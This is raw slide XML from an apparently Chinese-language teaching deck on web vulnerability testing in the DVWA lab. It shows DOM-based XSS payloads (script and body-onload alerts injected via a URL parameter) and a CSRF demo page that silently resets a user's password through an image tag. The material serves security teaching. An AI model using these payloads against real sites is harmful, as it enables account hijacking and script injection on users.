                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>      選擇</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>English</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按</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Select</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="向右箭號 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358345" y="5980670"/>
            <a:ext cx="840259" cy="7661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t>點選</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7864372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p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="35901"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014283" y="2973856"/>
            <a:ext cx="7115433" cy="3571216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358345" y="1601683"/>
            <a:ext cx="8060725" cy="400110"/>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endParaRPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8"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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>不</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>正常輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>      選擇</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>English</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按</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Select</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2405446"/>
            <a:ext cx="9003957" cy="400110"/>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r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>&lt;script&gt;alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>("hack");&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="向下箭號 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="2001793"/>
            <a:ext cx="411892" cy="40365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619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內容版面配置區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600" y="3013964"/>
            <a:ext cx="7551736" cy="3827336"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1504825"/>
            <a:ext cx="8060725" cy="400110"/>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endParaRPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="標題 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="315632"/>
            <a:ext cx="9144000" cy="1035305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">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DVWA_1.10_Medium</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rPr>
              <a:t>::</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2237689"/>
            <a:ext cx="9003957" cy="707886"/>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r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>&gt;/opttion&gt;&lt;/select&gt;&lt;body </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>=alert("XSS")&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="向下箭號 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4571999" y="1870197"/>
            <a:ext cx="411892" cy="40365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67234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2" y="3198158"/>
            <a:ext cx="9144000" cy="2697516"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="94734" y="1636981"/>
            <a:ext cx="8060725" cy="400110"/>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endParaRPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="標題 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="398078"/>
            <a:ext cx="9144000" cy="1035305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="002060"/>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r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>不</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>正常輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2405446"/>
            <a:ext cx="9003957" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>http://192.168.1.250/DVWA/vulnerabilities/xss_d/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>default=English</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>#&lt;script&gt;alert("you have been hacked");&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="向下箭號 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="2001793"/>
            <a:ext cx="411892" cy="40365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 name="內容版面配置區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4671" y="4555331"/>
            <a:ext cx="2371725" cy="2247900"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="圖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6396" y="4683919"/>
            <a:ext cx="5229225" cy="1990725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="向下箭號 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="3062802" y="5704047"/>
            <a:ext cx="411892" cy="403653"/>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1077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CSRF exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="6600" dirty="0" smtClean="0"/>
              <a:t>in DVWA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="5400" dirty="0"/>
              <a:t>實務</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>測試</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="5400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>參考</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>資料</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>://www.freebuf.com/articles/web/118352.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34214790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21583"/>
            <a:ext cx="9144000" cy="749571"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>exploitation</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872338" y="2078174"/>
            <a:ext cx="7190320" cy="4351338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1071154"/>
            <a:ext cx="9144000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="87874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內容版面配置區 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="9816"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="353852" y="1905697"/>
            <a:ext cx="8193248" cy="3874501"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3377206" y="2293472"/>
            <a:ext cx="4230094" cy="221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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="圖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8433" y="4439386"/>
            <a:ext cx="2593609" cy="2296176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5229490" y="5165809"/>
            <a:ext cx="1753429"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將密碼修改為test123</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="向右箭號 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5964793" y="5525164"/>
            <a:ext cx="927279" cy="53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0"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p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="715188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022" y="2208322"/>
            <a:ext cx="4252315" cy="3913077"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="內容版面配置區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948" y="2707311"/>
            <a:ext cx="4385658" cy="2420830"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="向右箭號 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4108360" y="3982061"/>
            <a:ext cx="927279" cy="53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9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79948" y="4880658"/>
            <a:ext cx="4922372" cy="11310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pt-BR" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>&lt;img src="http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-TW" sz="1350" dirty="0" smtClean="0"/>
              <a:t>://x.x.x.x/DVWA/vulnerabilities/csrf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-TW" sz="1350" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password_new=ksu123456&amp;password_conf=ksu123456</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>&amp;Change=Change#" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pt-BR" altLang="zh-TW" sz="1350" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>&lt;h1&gt;CSRF Demo&lt;h1&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79948" y="4580576"/>
            <a:ext cx="884922"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CSRF.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5160496" y="4003212"/>
            <a:ext cx="3547766"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受CSRF攻擊，需使用密碼ksu123456才能登入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1774893" y="3058158"/>
            <a:ext cx="668092" cy="21366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2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069930" y="1951360"/>
            <a:ext cx="2618917" cy="55399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sz="1500" dirty="0"/>
              <a:t>瀏覽遭受CSRF攻擊的網頁</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>http://x.x.x.x/DVWA/CSRF.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11"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p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="268447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126"/>
            <a:ext cx="9144000" cy="1325563"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Types of Cross-Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>類型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
